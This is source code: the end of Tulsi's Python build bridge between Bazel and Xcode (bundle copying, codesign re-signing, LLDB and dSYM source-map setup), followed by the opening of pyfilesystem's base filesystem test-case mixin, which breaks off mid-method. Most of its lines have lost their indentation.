self._PrintVerbose('Copying %s to %s' % (source_path, output_path))
try:
CopyOnWrite(full_source_path, output_path, tree=True)
except OSError as e:
_PrintXcodeError('Copy failed. %s' % e)
return 650
return 0
def _CopyFile(self, source_path, full_source_path, output_path):
"""Copies the given file to the given expected output path."""
self._PrintVerbose('Copying %s to %s' % (source_path, output_path))
output_path_dir = os.path.dirname(output_path)
if not os.path.exists(output_path_dir):
try:
os.makedirs(output_path_dir)
except OSError as e:
_PrintXcodeError('Failed to create output directory "%s". '
'%s' % (output_path_dir, e))
return 650
try:
CopyOnWrite(full_source_path, output_path)
except OSError as e:
_PrintXcodeError('Copy failed. %s' % e)
return 650
return 0
def _UnpackTarget(self, bundle_path, output_path, bundle_subpath):
"""Unpacks generated bundle into the given expected output path."""
self._PrintVerbose('Unpacking %s to %s' % (bundle_path, output_path))
if not os.path.isfile(bundle_path):
_PrintXcodeError('Generated bundle not found at "%s"' % bundle_path)
return 670
if os.path.isdir(output_path):
try:
shutil.rmtree(output_path)
except OSError as e:
        _PrintXcodeError('Failed to remove stale output directory "%s". '
'%s' % (output_path, e))
return 600
# We need to handle IPAs (from {ios, tvos}_application) differently from
# ZIPs (from the other bundled rules) because they output slightly different
# directory structures.
is_ipa = bundle_path.endswith('.ipa')
with zipfile.ZipFile(bundle_path, 'r') as zf:
for item in zf.infolist():
filename = item.filename
# Support directories do not seem to be needed by the debugger and are
# skipped.
basedir = filename.split(os.sep)[0]
if basedir.endswith('Support') or basedir.endswith('Support2'):
continue
if len(filename) < len(bundle_subpath):
continue
attributes = (item.external_attr >> 16) & 0o777
self._PrintVerbose('Extracting %s (%o)' % (filename, attributes),
level=1)
if not filename.startswith(bundle_subpath):
_PrintXcodeWarning('Mismatched extraction path. Bundle content '
'at "%s" expected to have subpath of "%s"' %
(filename, bundle_subpath))
dir_components = self._SplitPathComponents(filename)
# Get the file's path, ignoring the payload components if the archive
# is an IPA.
if is_ipa:
subpath = os.path.join(*dir_components[2:])
else:
subpath = os.path.join(*dir_components[1:])
target_path = os.path.join(output_path, subpath)
# Ensure the target directory exists.
try:
target_dir = os.path.dirname(target_path)
if not os.path.isdir(target_dir):
os.makedirs(target_dir)
except OSError as e:
_PrintXcodeError(
'Failed to create target path "%s" during extraction. %s' % (
target_path, e))
return 671
# If the archive item looks like a file, extract it.
if not filename.endswith(os.sep):
          with zf.open(item) as src, open(target_path, 'wb') as dst:
shutil.copyfileobj(src, dst)
# Patch up the extracted file's attributes to match the zip content.
if attributes:
os.chmod(target_path, attributes)
return 0
def _InstallDSYMBundles(self, output_dir, outputs_data):
"""Copies any generated dSYM bundles to the given directory."""
# Indicates that our aspect reports a dSYM was generated for this build.
has_dsym = outputs_data[0]['has_dsym']
if not has_dsym:
return 0, None
# Start the timer now that we know we have dSYM bundles to install.
timer = Timer('Installing DSYM bundles', 'installing_dsym').Start()
# Declares the Xcode-generated name of our main target's dSYM.
# This environment variable is always set, for any possible Xcode output
# that could generate a dSYM bundle.
target_dsym = os.environ.get('DWARF_DSYM_FILE_NAME')
if target_dsym:
dsym_to_process = set([(self.build_path, target_dsym)])
# Collect additional dSYM bundles generated by the dependencies of this
# build such as extensions or frameworks.
child_dsyms = set()
for data in outputs_data:
for bundle_info in data.get('embedded_bundles', []):
if not bundle_info['has_dsym']:
continue
# Uses the parent of archive_root to find dSYM bundles associated with
# app/extension/df bundles. Currently hinges on implementation of the
# build rules.
dsym_path = os.path.dirname(bundle_info['archive_root'])
bundle_full_name = (bundle_info['bundle_name'] +
bundle_info['bundle_extension'])
dsym_filename = '%s.dSYM' % bundle_full_name
child_dsyms.add((dsym_path, dsym_filename))
dsym_to_process.update(child_dsyms)
dsyms_found = []
for dsym_path, dsym_filename in dsym_to_process:
input_dsym_full_path = os.path.join(dsym_path, dsym_filename)
output_full_path = os.path.join(output_dir, dsym_filename)
exit_code, path = self._InstallBundle(input_dsym_full_path,
output_full_path)
if exit_code:
_PrintXcodeWarning('Failed to install dSYM "%s" (%s)'
% (dsym_filename, exit_code))
elif path is None:
_PrintXcodeWarning('Could not find a dSYM bundle named "%s"'
% dsym_filename)
else:
dsyms_found.append(path)
timer.End()
return 0, dsyms_found
def _ResignBundle(self, bundle_path, signing_identity, entitlements=None):
"""Re-signs the bundle with the given signing identity and entitlements."""
if not self.codesigning_allowed:
return 0
timer = Timer('\tSigning ' + bundle_path, 'signing_bundle').Start()
command = [
'xcrun',
'codesign',
'-f',
'--timestamp=none',
'-s',
signing_identity,
]
if entitlements:
command.extend(['--entitlements', entitlements])
else:
command.append('--preserve-metadata=entitlements')
command.append(bundle_path)
returncode, output = self._RunSubprocess(command)
timer.End()
if returncode:
_PrintXcodeError('Re-sign command %r failed. %s' % (command, output))
return 800 + returncode
return 0
def _ResignTestArtifacts(self):
"""Resign test related artifacts that Xcode injected into the outputs."""
if not self.is_test:
return 0
# Extract the signing identity from the bundle at the expected output path
# since that's where the signed bundle from bazel was placed.
signing_identity = self._ExtractSigningIdentity(self.artifact_output_path)
if not signing_identity:
return 800
exit_code = 0
timer = Timer('Re-signing injected test host artifacts',
'resigning_test_host').Start()
if self.test_host_binary:
# For Unit tests, we need to resign the frameworks that Xcode injected
# into the test host bundle.
test_host_bundle = os.path.dirname(self.test_host_binary)
exit_code = self._ResignXcodeTestFrameworks(
test_host_bundle, signing_identity)
else:
# For UI tests, we need to resign the UI test runner app and the
# frameworks that Xcode injected into the runner app. The UI Runner app
# also needs to be signed with entitlements.
exit_code = self._ResignXcodeTestFrameworks(
self.codesigning_folder_path, signing_identity)
if exit_code == 0:
entitlements_path = self._InstantiateUIRunnerEntitlements()
if entitlements_path:
exit_code = self._ResignBundle(
self.codesigning_folder_path,
signing_identity,
entitlements_path)
else:
_PrintXcodeError('Could not instantiate UI runner entitlements.')
exit_code = 800
timer.End()
return exit_code
def _ResignXcodeTestFrameworks(self, bundle, signing_identity):
"""Re-signs the support frameworks injected by Xcode in the given bundle."""
if not self.codesigning_allowed:
return 0
for framework in XCODE_INJECTED_FRAMEWORKS:
framework_path = os.path.join(
bundle, 'Frameworks', framework)
if os.path.isdir(framework_path) or os.path.isfile(framework_path):
exit_code = self._ResignBundle(framework_path, signing_identity)
if exit_code != 0:
return exit_code
return 0
def _InstantiateUIRunnerEntitlements(self):
"""Substitute team and bundle identifiers into UI runner entitlements.
This method throws an IOError exception if the template wasn't found in
its expected location, or an OSError if the expected output folder could
not be created.
Returns:
The path to where the entitlements file was generated.
"""
if not self.codesigning_allowed:
return None
if not os.path.exists(self.derived_sources_folder_path):
os.makedirs(self.derived_sources_folder_path)
output_file = os.path.join(
self.derived_sources_folder_path,
self.bazel_product_name + '_UIRunner.entitlements')
if os.path.exists(output_file):
os.remove(output_file)
with open(self.runner_entitlements_template, 'r') as template:
contents = template.read()
contents = contents.replace(
'$(TeamIdentifier)',
self._ExtractSigningTeamIdentifier(self.artifact_output_path))
contents = contents.replace(
'$(BundleIdentifier)',
self._ExtractSigningBundleIdentifier(self.artifact_output_path))
with open(output_file, 'w') as output:
output.write(contents)
return output_file
def _ExtractSigningIdentity(self, signed_bundle):
"""Returns the identity used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'Authority')
def _ExtractSigningTeamIdentifier(self, signed_bundle):
"""Returns the team identifier used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'TeamIdentifier')
def _ExtractSigningBundleIdentifier(self, signed_bundle):
"""Returns the bundle identifier used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'Identifier')
def _ExtractSigningAttribute(self, signed_bundle, attribute):
"""Returns the attribute used to sign the given bundle path."""
if not self.codesigning_allowed:
return '<CODE_SIGNING_ALLOWED=NO>'
cached = self.codesign_attributes.get(signed_bundle)
if cached:
return cached.Get(attribute)
timer = Timer('\tExtracting signature for ' + signed_bundle,
'extracting_signature').Start()
output = subprocess.check_output(['xcrun',
'codesign',
'-dvv',
signed_bundle],
stderr=subprocess.STDOUT)
timer.End()
bundle_attributes = CodesignBundleAttributes(output)
self.codesign_attributes[signed_bundle] = bundle_attributes
return bundle_attributes.Get(attribute)
def _UpdateLLDBInit(self, clear_source_map=False):
"""Updates ~/.lldbinit-tulsiproj to enable debugging of Bazel binaries."""
# Make sure a reference to ~/.lldbinit-tulsiproj exists in ~/.lldbinit or
# ~/.lldbinit-Xcode. Priority is given to ~/.lldbinit-Xcode if it exists,
# otherwise the bootstrapping will be written to ~/.lldbinit.
BootstrapLLDBInit()
with open(TULSI_LLDBINIT_FILE, 'w') as out:
out.write('# This file is autogenerated by Tulsi and should not be '
'edited.\n')
if clear_source_map:
out.write('settings clear target.source-map\n')
return 0
if self.normalized_prefix_map:
source_map = ('./', self._NormalizePath(self.workspace_root))
out.write('# This maps the normalized root to that used by '
'%r.\n' % os.path.basename(self.project_file_path))
else:
# NOTE: settings target.source-map is different from
# DBGSourcePathRemapping; the former is an LLDB target-level
# remapping API that rewrites breakpoints, the latter is an LLDB
# module-level remapping API that changes DWARF debug info in memory.
#
# If we had multiple remappings, it would not make sense for the
# two APIs to share the same mappings. They have very different
# side-effects in how they individually handle debug information.
source_map = self._ExtractTargetSourceMap()
out.write('# This maps Bazel\'s execution root to that used by '
'%r.\n' % os.path.basename(self.project_file_path))
out.write('settings set target.source-map "%s" "%s"\n' % source_map)
return 0
def _DWARFdSYMBinaries(self, dsym_bundle_path):
"""Returns an array of abs paths to DWARF binaries in the dSYM bundle.
Args:
dsym_bundle_path: absolute path to the dSYM bundle.
Returns:
str[]: a list of strings representing the absolute paths to each binary
found within the dSYM bundle.
"""
dwarf_dir = os.path.join(dsym_bundle_path,
'Contents',
'Resources',
'DWARF')
dsym_binaries = []
for f in os.listdir(dwarf_dir):
# Ignore hidden files, such as .DS_Store files.
if not f.startswith('.'):
# Append full path info.
dsym_binary = os.path.join(dwarf_dir, f)
dsym_binaries.append(dsym_binary)
return dsym_binaries
def _UUIDInfoForBinary(self, source_binary_path):
"""Returns exit code of dwarfdump along with every UUID + arch found.
Args:
source_binary_path: absolute path to the binary file.
Returns:
(Int, str[(str, str)]): a tuple containing the return code of dwarfdump
as its first element, and a list of strings
representing each UUID found for each given
binary slice found within the binary with its
                              given architecture, if no error has occurred.
"""
returncode, output = self._RunSubprocess([
'xcrun',
'dwarfdump',
'--uuid',
source_binary_path
])
if returncode:
_PrintXcodeWarning('dwarfdump returned %d while finding the UUID for %s'
% (returncode, source_binary_path))
return (returncode, [])
# All UUIDs for binary slices will be returned as the second from left,
# from output; "UUID: D4DE5AA2-79EE-36FE-980C-755AED318308 (x86_64)
# /Applications/Calendar.app/Contents/MacOS/Calendar"
uuids_found = []
for dwarfdump_output in output.split('\n'):
if not dwarfdump_output:
continue
found_output = re.match(r'^(?:UUID: )([^ ]+) \(([^)]+)', dwarfdump_output)
if not found_output:
continue
found_uuid = found_output.group(1)
if not found_uuid:
continue
found_arch = found_output.group(2)
if not found_arch:
continue
uuids_found.append((found_uuid, found_arch))
return (0, uuids_found)
def _CreateUUIDPlist(self, dsym_bundle_path, uuid, arch, source_maps):
"""Creates a UUID.plist in a dSYM bundle to redirect sources.
Args:
dsym_bundle_path: absolute path to the dSYM bundle.
uuid: string representing the UUID of the binary slice with paths to
remap in the dSYM bundle.
arch: the architecture of the binary slice.
source_maps: list of tuples representing all absolute paths to source
files compiled by Bazel as strings ($0) associated with the
paths to Xcode-visible sources used for the purposes of
Tulsi debugging as strings ($1).
Returns:
Bool: True if no error was found, or False, representing a failure to
write when creating the plist.
"""
# Create a UUID plist at (dsym_bundle_path)/Contents/Resources/.
remap_plist = os.path.join(dsym_bundle_path,
'Contents',
'Resources',
'%s.plist' % uuid)
# Via an XML plist, add the mappings from _ExtractTargetSourceMap().
try:
with open(remap_plist, 'w') as out:
out.write('<?xml version="1.0" encoding="UTF-8"?>\n'
'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
'<plist version="1.0">\n'
'<dict>\n'
'<key>DBGSourcePathRemapping</key>\n'
'<dict>\n')
for source_map in source_maps:
# Add the mapping as a DBGSourcePathRemapping to the UUID plist here.
out.write('<key>%s</key>\n<string>%s</string>\n' % source_map)
# Make sure that we also set DBGVersion to 3.
out.write('</dict>\n'
'<key>DBGVersion</key>\n'
'<string>3</string>\n'
'</dict>\n'
'</plist>\n')
except OSError as e:
_PrintXcodeError('Failed to write %s, received error %s' %
(remap_plist, e))
return False
# Update the dSYM symbol cache with a reference to this dSYM bundle.
err_msg = self.update_symbol_cache.UpdateUUID(uuid,
dsym_bundle_path,
arch)
if err_msg:
_PrintXcodeWarning('Attempted to save (uuid, dsym_bundle_path, arch) '
'to DBGShellCommands\' dSYM cache, but got error '
'\"%s\".' % err_msg)
return True
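  # For reference, with a single (hypothetical) mapping the plist written above
  # renders roughly as:
  #
  #   <?xml version="1.0" encoding="UTF-8"?>
  #   <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
  #    "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  #   <plist version="1.0">
  #   <dict>
  #   <key>DBGSourcePathRemapping</key>
  #   <dict>
  #   <key>/private/var/tmp/_bazel/execroot/myws/</key>
  #   <string>/Users/dev/myws/</string>
  #   </dict>
  #   <key>DBGVersion</key>
  #   <string>3</string>
  #   </dict>
  #   </plist>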
def _CleanExistingDSYMs(self):
"""Clean dSYM bundles that were left over from a previous build."""
output_dir = self.built_products_dir
output_dir_list = os.listdir(output_dir)
for item in output_dir_list:
if item.endswith('.dSYM'):
shutil.rmtree(os.path.join(output_dir, item))
def _PlistdSYMPaths(self, dsym_bundle_path):
"""Adds Plists to a given dSYM bundle to redirect DWARF data."""
# Retrieve the paths that we are expected to remap.
# Always include a direct path from the execroot to Xcode-visible sources.
source_maps = [self._ExtractTargetSourceMap()]
# Remap relative paths from the workspace root.
if self.normalized_prefix_map:
# Take the normalized path and map that to Xcode-visible sources.
source_maps.append(('./', self._NormalizePath(self.workspace_root)))
# Find the binaries within the dSYM bundle. UUIDs will match that of the
# binary it was based on.
dsym_binaries = self._DWARFdSYMBinaries(dsym_bundle_path)
if not dsym_binaries:
_PrintXcodeWarning('Could not find the binaries that the dSYM %s was '
'based on to determine DWARF binary slices to patch. '
'Debugging will probably fail.' % (dsym_bundle_path))
return 404
# Find the binary slice UUIDs with dwarfdump from each binary.
for source_binary_path in dsym_binaries:
returncode, uuid_info_found = self._UUIDInfoForBinary(source_binary_path)
if returncode:
return returncode
# Create a plist per UUID, each indicating a binary slice to remap paths.
for uuid, arch in uuid_info_found:
plist_created = self._CreateUUIDPlist(dsym_bundle_path,
uuid,
arch,
source_maps)
if not plist_created:
return 405
return 0
def _NormalizePath(self, path):
"""Returns paths with a common form, normalized with a trailing slash.
Args:
path: a file system path given in the form of a string.
Returns:
str: a normalized string with a trailing slash, based on |path|.
"""
return os.path.normpath(path) + os.sep
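  # e.g. (hypothetical path) _NormalizePath('/Users/dev/myws//') returns
  # '/Users/dev/myws/', guaranteeing exactly one trailing separator.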
def _ExtractTargetSourceMap(self, normalize=True):
"""Extracts the source path as a tuple associated with the WORKSPACE path.
Args:
normalize: Defines if all paths should be normalized. Preferred for APIs
like DBGSourcePathRemapping and target.source-map but won't
work for the purposes of -fdebug-prefix-map.
Returns:
None: if an error occurred.
(str, str): a single tuple representing all absolute paths to source
files compiled by Bazel as strings ($0) associated with
the paths to Xcode-visible sources used for the purposes
of Tulsi debugging as strings ($1).
"""
# All paths route to the "workspace root" for sources visible from Xcode.
sm_destpath = self.workspace_root
if normalize:
sm_destpath = self._NormalizePath(sm_destpath)
# Add a redirection for the Bazel execution root, the path where sources
# are referenced by Bazel.
sm_execroot = self.bazel_exec_root
if normalize:
sm_execroot = self._NormalizePath(sm_execroot)
return (sm_execroot, sm_destpath)
def _LinkTulsiWorkspace(self):
"""Links the Bazel Workspace to the Tulsi Workspace (`tulsi-workspace`)."""
tulsi_workspace = self.workspace_root + '/tulsi-workspace'
if os.path.islink(tulsi_workspace):
os.unlink(tulsi_workspace)
os.symlink(self.bazel_exec_root, tulsi_workspace)
if not os.path.exists(tulsi_workspace):
_PrintXcodeError(
'Linking Tulsi Workspace to %s failed.' % tulsi_workspace)
return -1
@staticmethod
def _SplitPathComponents(path):
"""Splits the given path into an array of all of its components."""
components = path.split(os.sep)
# Patch up the first component if path started with an os.sep
if not components[0]:
components[0] = os.sep
return components
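  # e.g. _SplitPathComponents('/a/b/c') -> ['/', 'a', 'b', 'c'], while a
  # relative path like 'a/b' -> ['a', 'b'] (illustrative values only).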
def _RunSubprocess(self, cmd):
"""Runs the given command as a subprocess, returning (exit_code, output)."""
self._PrintVerbose('%r' % cmd, 1)
process = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output, _ = process.communicate()
return (process.returncode, output)
def _PrintVerbose(self, msg, level=0):
if self.verbose > level:
_PrintUnbuffered(msg)
def main(argv):
build_settings = bazel_build_settings.BUILD_SETTINGS
if build_settings is None:
_Fatal('Unable to resolve build settings. Please report a Tulsi bug.')
return 1
return BazelBuildBridge(build_settings).Run(argv)
if __name__ == '__main__':
_LockFileAcquire('/tmp/tulsi_bazel_build.lock')
_logger = tulsi_logging.Logger()
logger_warning = tulsi_logging.validity_check()
if logger_warning:
_PrintXcodeWarning(logger_warning)
_timer = Timer('Everything', 'complete_build').Start()
signal.signal(signal.SIGINT, _InterruptHandler)
_exit_code = main(sys.argv)
_timer.End()
sys.exit(_exit_code)
|
__init__.py
|
#!/usr/bin/env python
"""
fs.tests: testcases for the fs module
"""
# Send any output from the logging module to stdout, so it will
# be captured by nose and reported appropriately
import sys
import logging
logging.basicConfig(level=logging.ERROR, stream=sys.stdout)
from fs.base import *
from fs.path import *
from fs.errors import *
from fs.filelike import StringIO
import datetime
import unittest
import os
import os.path
import pickle
import random
import copy
import time
try:
import threading
except ImportError:
import dummy_threading as threading
import six
from six import PY3, b
class FSTestCases(object):
"""Base suite of testcases for filesystem implementations.
Any FS subclass should be capable of passing all of these tests.
    To apply the tests to your own FS implementation, simply use FSTestCases
as a mixin for your own unittest.TestCase subclass and have the setUp
method set self.fs to an instance of your FS implementation.
NB. The Filesystem being tested must have a capacity of at least 3MB.
This class is designed as a mixin so that it's not detected by test
loading tools such as nose.
"""
def check(self, p):
"""Check that a file exists within self.fs"""
return self.fs.exists(p)
def test_invalid_chars(self):
"""Check paths validate ok"""
        # Will have to be overridden selectively for custom validatepath methods
self.assertEqual(self.fs.validatepath(''), None)
self.assertEqual(self.fs.validatepath('.foo'), None)
self.assertEqual(self.fs.validatepath('foo'), None)
self.assertEqual(self.fs.validatepath('foo/bar'), None)
self.assertTrue(self.fs.isvalidpath('foo/bar'))
def test_tree(self):
"""Test tree print"""
self.fs.makedir('foo')
self.fs.createfile('foo/bar.txt')
self.fs.tree()
def test_meta(self):
"""Checks getmeta / hasmeta are functioning"""
# getmeta / hasmeta are hard to test, since there is no way to validate
# the implementation's response
meta_names = ["read_only",
"network",
"unicode_paths"]
stupid_meta = 'thismetashouldnotexist!"r$$%^&&*()_+'
self.assertRaises(NoMetaError, self.fs.getmeta, stupid_meta)
self.assertFalse(self.fs.hasmeta(stupid_meta))
self.assertEqual(None, self.fs.getmeta(stupid_meta, None))
self.assertEqual(3.14, self.fs.getmeta(stupid_meta, 3.14))
for meta_name in meta_names:
try:
meta = self.fs.getmeta(meta_name)
self.assertTrue(self.fs.hasmeta(meta_name))
except NoMetaError:
self.assertFalse(self.fs.hasmeta(meta_name))
def test_root_dir(self):
self.assertTrue(self.fs.isdir(""))
self.assertTrue(self.fs.isdir("/"))
# These may be false (e.g. empty dict) but mustn't raise errors
self.fs.getinfo("")
self.assertTrue(self.fs.getinfo("/") is not None)
def test_getsyspath(self):
try:
syspath = self.fs.getsyspath("/")
except NoSysPathError:
pass
else:
self.assertTrue(isinstance(syspath, str))
syspath = self.fs.getsyspath("/", allow_none=True)
if syspath is not None:
self.assertTrue(isinstance(syspath, str))
def test_debug(self):
str(self.fs)
repr(self.fs)
self.assertTrue(hasattr(self.fs, 'desc'))
def test_open_on_directory(self):
self.fs.makedir("testdir")
try:
f = self.fs.open("testdir")
except ResourceInvalidError:
pass
        except Exception:
            ecls = sys.exc_info()[0]
            assert False, "%s raised instead of ResourceInvalidError" % (ecls,)
else:
f.close()
assert False, "ResourceInvalidError was not raised"
def test_writefile(self):
self.assertRaises(ResourceNotFoundError, self.fs.open, "test1.txt")
f = self.fs.open("test1.txt", "wb")
f.write(b("testing"))
f.close()
self.assertTrue(self.check("test1.txt"))
f = self.fs.open("test1.txt", "rb")
self.assertEqual(f.read(), b("testing"))
f.close()
f = self.fs.open("test1.txt", "wb")
f.write(b("test file overwrite"))
f.close()
self.assertTrue(self.check("test1.txt"))
f = self.fs.open("test1.txt", "rb")
self.assertEqual(f.read(), b("test file overwrite"))
f.close()
def test_createfile(self):
test = b('now with content')
self.fs.createfile("test.txt")
self.assertTrue(self.fs.exists("test.txt"))
self.assertEqual(self.fs.getcontents("test.txt", "rb"), b(''))
self.fs.setcontents("test.txt", test)
self.fs.createfile("test.txt")
self.assertEqual(self.fs.getcontents("test.txt", "rb"), test)
self.fs.createfile("test.txt", wipe=True)
self.assertEqual(self.fs.getcontents("test.txt", "rb"), b(''))
def test_readline(self):
text = b"Hello\nWorld\n"
self.fs.setcontents('a.txt', text)
with self.fs.open('a.txt', 'rb') as f:
line = f.readline()
self.assertEqual(line, b"Hello\n")
def test_setcontents(self):
# setcontents() should accept both a string...
self.fs.setcontents("hello", b("world"))
self.assertEqual(self.fs.getcontents("hello", "rb"), b("world"))
# ...and a file-like object
self.fs.setcontents("hello", StringIO(b("to you, good sir!")))
self.assertEqual(self.fs.getcontents(
"hello", "rb"), b("to you, good sir!"))
# setcontents() should accept both a string...
self.fs.setcontents("hello", b("world"), chunk_size=2)
self.assertEqual(self.fs.getcontents("hello", "rb"), b("world"))
# ...and a file-like object
self.fs.setcontents("hello", StringIO(
b("to you, good sir!")), chunk_size=2)
self.assertEqual(self.fs.getcontents(
"hello", "rb"), b("to you, good sir!"))
self.fs.setcontents("hello", b(""))
self.assertEqual(self.fs.getcontents("hello", "rb"), b(""))
def test_setcontents_async(self):
# setcontents() should accept both a string...
self.fs.setcontents_async("hello", b("world")).wait()
self.assertEqual(self.fs.getcontents("hello", "rb"), b("world"))
# ...and a file-like object
self.fs.setcontents_async("hello", StringIO(
b("to you, good sir!"))).wait()
self.assertEqual(self.fs.getcontents("hello"), b("to you, good sir!"))
self.fs.setcontents_async("hello", b("world"), chunk_size=2).wait()
self.assertEqual(self.fs.getcontents("hello", "rb"), b("world"))
# ...and a file-like object
self.fs.setcontents_async("hello", StringIO(
b("to you, good sir!")), chunk_size=2).wait()
self.assertEqual(self.fs.getcontents(
"hello", "rb"), b("to you, good sir!"))
def test_isdir_isfile(self):
self.assertFalse(self.fs.exists("dir1"))
self.assertFalse(self.fs.isdir("dir1"))
self.assertFalse(self.fs.isfile("a.txt"))
self.fs.setcontents("a.txt", b(''))
self.assertFalse(self.fs.isdir("dir1"))
self.assertTrue(self.fs.exists("a.txt"))
self.assertTrue(self.fs.isfile("a.txt"))
self.assertFalse(self.fs.exists("a.txt/thatsnotadir"))
self.fs.makedir("dir1")
self.assertTrue(self.fs.isdir("dir1"))
self.assertTrue(self.fs.exists("dir1"))
self.assertTrue(self.fs.exists("a.txt"))
self.fs.remove("a.txt")
self.assertFalse(self.fs.exists("a.txt"))
def test_listdir(self):
def check_unicode(items):
for item in items:
self.assertTrue(isinstance(item, str))
self.fs.setcontents("a", b(''))
self.fs.setcontents("b", b(''))
self.fs.setcontents("foo", b(''))
self.fs.setcontents("bar", b(''))
# Test listing of the root directory
d1 = self.fs.listdir()
self.assertEqual(len(d1), 4)
self.assertEqual(sorted(d1), ["a", "b", "bar", "foo"])
check_unicode(d1)
d1 = self.fs.listdir("")
self.assertEqual(len(d1), 4)
self.assertEqual(sorted(d1), ["a", "b", "bar", "foo"])
check_unicode(d1)
d1 = self.fs.listdir("/")
self.assertEqual(len(d1), 4)
check_unicode(d1)
# Test listing absolute paths
d2 = self.fs.listdir(absolute=True)
self.assertEqual(len(d2), 4)
self.assertEqual(sorted(d2), ["/a", "/b", "/bar", "/foo"])
check_unicode(d2)
# Create some deeper subdirectories, to make sure their
        # contents are not inadvertently included
self.fs.makedir("p/1/2/3", recursive=True)
self.fs.setcontents("p/1/2/3/a", b(''))
self.fs.setcontents("p/1/2/3/b", b(''))
self.fs.setcontents("p/1/2/3/foo", b(''))
self.fs.setcontents("p/1/2/3/bar", b(''))
self.fs.makedir("q")
# Test listing just files, just dirs, and wildcards
dirs_only = self.fs.listdir(dirs_only=True)
files_only = self.fs.listdir(files_only=True)
contains_a = self.fs.listdir(wildcard="*a*")
self.assertEqual(sorted(dirs_only), ["p", "q"])
self.assertEqual(sorted(files_only), ["a", "b", "bar", "foo"])
self.assertEqual(sorted(contains_a), ["a", "bar"])
check_unicode(dirs_only)
check_unicode(files_only)
check_unicode(contains_a)
# Test listing a subdirectory
d3 = self.fs.listdir("p/1/2/3")
self.assertEqual(len(d3), 4)
self.assertEqual(sorted(d3), ["a", "b", "bar", "foo"])
check_unicode(d3)
        # Test listing a subdirectory with absolute and full paths
d4 = self.fs.listdir("p/1/2/3", absolute=True)
self.assertEqual(len(d4), 4)
self.assertEqual(sorted(d4), ["/p/1/2/3/a", "/p/1/2/3/b", "/p/1/2/3/bar", "/p/1/2/3/foo"])
check_unicode(d4)
d4 = self.fs.listdir("p/1/2/3", full=True)
self.assertEqual(len(d4), 4)
self.assertEqual(sorted(d4), ["p/1/2/3/a", "p/1/2/3/b", "p/1/2/3/bar", "p/1/2/3/foo"])
check_unicode(d4)
# Test that appropriate errors are raised
self.assertRaises(ResourceNotFoundError, self.fs.listdir, "zebra")
self.assertRaises(ResourceInvalidError, self.fs.listdir, "foo")
def test_listdirinfo(self):
def check_unicode(items):
for (nm, info) in items:
self.assertTrue(isinstance(nm, str))
def check_equal(items, target):
names = [nm for (nm, info) in items]
self.assertEqual(sorted(names), sorted(target))
self.fs.setcontents("a", b(''))
self.fs.setcontents("b", b(''))
self.fs.setcontents("foo", b(''))
self.fs.setcontents("bar", b(''))
# Test listing of the root directory
d1 = self.fs.listdirinfo()
self.assertEqual(len(d1), 4)
check_equal(d1, ["a", "b", "bar", "foo"])
check_unicode(d1)
d1 = self.fs.listdirinfo("")
self.assertEqual(len(d1), 4)
check_equal(d1, ["a", "b", "bar", "foo"])
check_unicode(d1)
d1 = self.fs.listdirinfo("/")
self.assertEqual(len(d1), 4)
check_equal(d1, ["a", "b", "bar", "foo"])
check_unicode(d1)
# Test listing absolute paths
d2 = self.fs.listdirinfo(absolute=True)
self.assertEqual(len(d2), 4)
check_equal(d2, ["/a", "/b", "/bar", "/foo"])
check_unicode(d2)
# Create some deeper subdirectories, to make sure their
        # contents are not inadvertently included
self.fs.makedir("p/1/2/3", recursive=True)
self.fs.setcontents("p/1/2/3/a", b(''))
self.fs.setcontents("p/1/2/3/b", b(''))
self.fs.setcontents("p/1/2/3/foo", b(''))
self.fs.setcontents("p/1/2/3/bar", b(''))
self.fs.makedir("q")
# Test listing just files, just dirs, and wildcards
dirs_only = self.fs.listdirinfo(dirs_only=True)
files_only = self.fs.listdirinfo(files_only=True)
contains_a = self.fs.listdirinfo(wildcard="*a*")
check_equal(dirs_only, ["p", "q"])
check_equal(files_only, ["a", "b", "bar", "foo"])
check_equal(contains_a, ["a", "bar"])
check_unicode(dirs_only)
check_unicode(files_only)
check_unicode(contains_a)
# Test listing a subdirectory
d3 = self.fs.listdirinfo("p/1/2/3")
self.assertEqual(len(d3), 4)
check_equal(d3, ["a", "b", "bar", "foo"])
check_unicode(d3)
        # Test listing a subdirectory with absolute and full paths
d4 = self.fs.listdirinfo("p/1/2/3", absolute=True)
self.assertEqual(len(d4), 4)
check_equal(d4, ["/p/1/2/3/a", "/p/1/2/3/b", "/p/1/2/3/bar", "/p/1/2/3/foo"])
check_unicode(d4)
d4 = self.fs.listdirinfo("p/1/2/3", full=True)
self.assertEqual(len(d4), 4)
check_equal(d4, ["p/1/2/3/a", "p/1/2/3/b", "p/1/2/3/bar", "p/1/2/3/foo"])
check_unicode(d4)
# Test that appropriate errors are raised
self.assertRaises(ResourceNotFoundError, self.fs.listdirinfo, "zebra")
self.assertRaises(ResourceInvalidError, self.fs.listdirinfo, "foo")
def test_walk(self):
self.fs.setcontents('a.txt', b('hello'))
self.fs.setcontents('b.txt', b('world'))
self.fs.makeopendir('foo').setcontents('c', b('123'))
sorted_walk = sorted([(d, sorted(fs)) for (d, fs) in self.fs.walk()])
self.assertEqual(sorted_walk,
[("/", ["a.txt", "b.txt"]),
("/foo", ["c"])])
# When searching breadth-first, shallow entries come first
found_a = False
for _, files in self.fs.walk(search="breadth"):
if "a.txt" in files:
found_a = True
if "c" in files:
break
assert found_a, "breadth search order was wrong"
# When searching depth-first, deep entries come first
found_c = False
for _, files in self.fs.walk(search="depth"):
if "c" in files:
found_c = True
if "a.txt" in files:
break
assert found_c, "depth search order was wrong: " + \
str(list(self.fs.walk(search="depth")))
def test_walk_wildcard(self):
self.fs.setcontents('a.txt', b('hello'))
self.fs.setcontents('b.txt', b('world'))
self.fs.makeopendir('foo').setcontents('c', b('123'))
self.fs.makeopendir('.svn').setcontents('ignored', b(''))
for dir_path, paths in self.fs.walk(wildcard='*.txt'):
for path in paths:
self.assertTrue(path.endswith('.txt'))
for dir_path, paths in self.fs.walk(wildcard=lambda fn: fn.endswith('.txt')):
for path in paths:
self.assertTrue(path.endswith('.txt'))
def test_walk_dir_wildcard(self):
